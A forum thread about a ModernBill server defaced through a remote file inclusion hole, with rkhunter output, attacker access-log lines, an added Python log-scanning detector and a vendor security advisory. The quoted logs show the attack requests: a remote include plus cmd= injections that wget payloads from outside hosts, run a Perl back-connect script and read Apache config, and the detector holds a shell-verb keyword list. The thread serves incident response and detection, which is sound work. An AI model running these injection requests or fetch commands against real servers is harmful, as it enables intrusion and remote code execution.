
Hacked by Infection Group

ryanz

Basic Pleskian
Hacked by Infection Group (Check your Modernbill Version)

Hi,

One of our servers was hacked by "Infection Group" and all index files were replaced by modified index.html files.

So far I only found two executable files called l_all.exe and ram.exe in /tmp

Does anyone have experience with this or know how they did it and what to check for?

Any help would be appreciated.
 
Thanks pdreissen,

We have chkrootkit installed and it came up clean. I've now installed rkhunter and get the following warnings on an RH9 (fully updated) Plesk 7.5.X:

Application advisories
* Application scan
Checking Apache2 modules ... [ Not found ]
Checking Apache configuration ... [ OK ]

* Application version scan
- GnuPG 1.2.1 [ Old or patched version ]
- Apache 2.0.40 [ Old or patched version ]
- Bind DNS [unknown] [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
PHP Warning: Function registration failed - duplicate name - sg_load in Unknown on line 0
PHP Warning: SourceGuardian: Unable to register functions, unable to load in Unknown on line 0
- PHP 4.3.10 [ OK ]
- Procmail MTA 3.22 [ OK ]
- ProFTPd 1.2.10 [ OK ]
- OpenSSH 3.9.0p1 [ OK ]

---------------------------- Scan results ----------------------------

MD5
MD5 compared: 51
Incorrect MD5 checksums: 0

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 3

Scanning took 126 seconds

-----------------------------------------------------------------------

It seems all index.php, index.html, index.jsp, etc. were replaced by an index file in /tmp

Still looking through the logs...
 
Seems that some of your apps are old and possibly "unsafe" versions.
Please get those updated.

Also check /var/spool/cron; maybe there is an Apache cron entry...

Remove it if you don't need what's inside it.

Please read this thread for some good advice on how to secure your server:

http://forum.plesk.com/showthread.php?s=&threadid=19876
 
Look at these extracts from a domain logfile:

"GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://doptik.i8.com/Bd/bd_daemon.jpg HTTP/1.1" 200 2575 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20geocities.com/deiz0r/dc.pl HTTP/1.1" 200 2556 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;perl%20dc.pl%20201.0.218.111%2021 HTTP/1.1" 200 2287 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=locate%20httpd.conf HTTP/1.1" 200 2585 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.conf%20|%20grep%20ServerName HTTP/1.1" 200 2350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/;ls HTTP/1.1" 200 2247 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/CVS;ls HTTP/1.1" 200 2247 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/;ls HTTP/1.1" 200 2247 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20ServerName HTTP/1.1" 200 3164 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20DocumentRoot HTTP/1.1" 200 3349 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/default;ls HTTP/1.1" 200 2205 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/;ls HTTP/1.1" 200 4350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts;ls HTTP/1.1" 200 4350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;ls HTTP/1.1" 200 3502 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 2556 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 3327 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/ram.exe HTTP/1.1" 200 3322 "
GET /ram.exe HTTP/1.1" 403 562 "
GET /l_all.exe HTTP/1.1" 200 497152 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs/modernbill/;cat%20ram.exe HTTP/1.1" 200 2212 "
GET /l_all.exe HTTP/1.1" 200 497152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0

Maybe this has some clues and can help some of the other users. The IP addresses were 200.232.233.235 and 201.0.218.111
 
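As an added example (not code from the thread, from Plesk or from ModernBill), here is a small Python script that runs the detection logic a responder would want over Apache access-log lines of the kind quoted above. It flags three things the extracts show: a query parameter whose value is itself a URL (the remote file inclusion through DIR=), a cmd= parameter carrying shell verbs (cd, wget, perl, cat, uname, id, locate), and a later direct request for a file that an earlier wget pulled onto the box (the ram.exe / l_all.exe fetches). The sample log lines are constructed for this example: the attacker address 200.232.233.235 and the hostnames are the ones quoted in the thread, but the timestamps, the user agents and the two harmless client addresses are made up.

```python
"""Flag remote-file-inclusion (RFI) and command-injection attempts in Apache access logs.

Three checks, each taken from the exploitation trace in this thread:
  1. remote-include      : a query value that is itself a URL (DIR=http://.../newcmd.gif?)
  2. command-injection   : a cmd= value containing shell verbs (cd, wget, uname, id, ...)
  3. dropped-file-fetch  : a later request for a file that an earlier 'wget' pulled onto the host
The scan is stateful so that check 3 can correlate across lines.
"""
import re
from os.path import basename
from urllib.parse import unquote_plus, urlsplit

# Constructed sample (combined log format). Attacker IP and hostnames are from the thread;
# timestamps, user agents and the 10.0.0.x clients are invented for the example.
SAMPLE_LOG = """\
200.232.233.235 - - [10/Mar/2005:03:12:01 +0100] "GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/ram.exe HTTP/1.1" 200 3322 "-" "Mozilla/4.0"
200.232.233.235 - - [10/Mar/2005:03:12:05 +0100] "GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "-" "Mozilla/4.0"
200.232.233.235 - - [10/Mar/2005:03:12:09 +0100] "GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0"
10.0.0.7 - - [10/Mar/2005:03:13:00 +0100] "GET /modernbill/samples/news.php?id=12 HTTP/1.1" 200 2100 "-" "Mozilla/4.0"
10.0.0.8 - - [10/Mar/2005:03:14:00 +0100] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/4.0"
"""

# client, ident, user, [timestamp], "METHOD target [PROTO]", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# shell verbs seen in the trace plus a few close relatives; must sit at a command boundary
SHELL_VERB = re.compile(
    r'(?:^|[;|&\s])(?:cd|ls|cat|wget|curl|perl|sh|bash|uname|id|locate|chmod)(?:\s|;|$)'
)
WGET_URL = re.compile(r'\bwget\s+(\S+)')


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode keys and values.

    Deliberately not parse_qs(): older Pythons also split on ';', which would
    cut 'cd /tmp;wget ...' in half and hide the injected command chain.
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])          # target starts with '/', so no scheme confusion
    rec['path'] = parts.path
    rec['params'] = parse_query(parts.query)
    return rec


def scan(log_text):
    """Return a list of findings (ip, reason, detail, status), in log order."""
    findings = []
    dropped = set()   # basenames of files pulled onto the host via wget in a cmd= parameter
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for key, values in rec['params'].items():
            for value in values:
                if REMOTE_URL.match(value):
                    findings.append(dict(ip=rec['ip'], reason='remote-include',
                                         detail=f'{key}={value}', status=rec['status']))
                if key.lower() == 'cmd' and SHELL_VERB.search(value):
                    findings.append(dict(ip=rec['ip'], reason='command-injection',
                                         detail=value, status=rec['status']))
                    for url in WGET_URL.findall(value):
                        dropped.add(basename(urlsplit(url).path))
        # a later plain GET for a file the attacker dropped: 403 here means Apache refused it
        if basename(rec['path']) in dropped:
            findings.append(dict(ip=rec['ip'], reason='dropped-file-fetch',
                                 detail=rec['path'], status=rec['status']))
    return findings


def attacker_ips(findings):
    """Sorted, de-duplicated client addresses that produced at least one finding."""
    return sorted({f['ip'] for f in findings})


if __name__ == '__main__':
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']:16} {f['reason']:18} {f['status']}  {f['detail']}")
    print('attacker IPs:', ', '.join(attacker_ips(results)))
```

Run it against a real log with `scan(open('/var/log/httpd/access_log').read())`; the `remote-include` hits alone are enough to confirm the RFI, and the `dropped-file-fetch` correlation tells you which payload names to look for in /tmp and the document roots, as was done above with l_all.exe and ram.exe.
 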
Look at this

From Modernbill Support

Version 4.3.1 Release - Security Update

In keeping with our quarterly release policy, ModernGigabyte is proud to release our new version 4.3.1. Please note that this version release contains some important security upgrades. You will want to upgrade to this version as soon as practicable. Changes in PHP scripting methods make it necessary for us to make changes from time to time to reduce the possibility of cross-scripting and SQL injection attacks.

If you are unable to upgrade, please ensure you have removed the "samples" directory from your ModernBill installation. The "samples" files are not intended for live usage and should only be used as an example of how to integrate some aspects of ModernBill into your existing web site.

This will protect your ModernBill from the "Remote File Include Vulnerability" until you can upgrade to the latest release.
 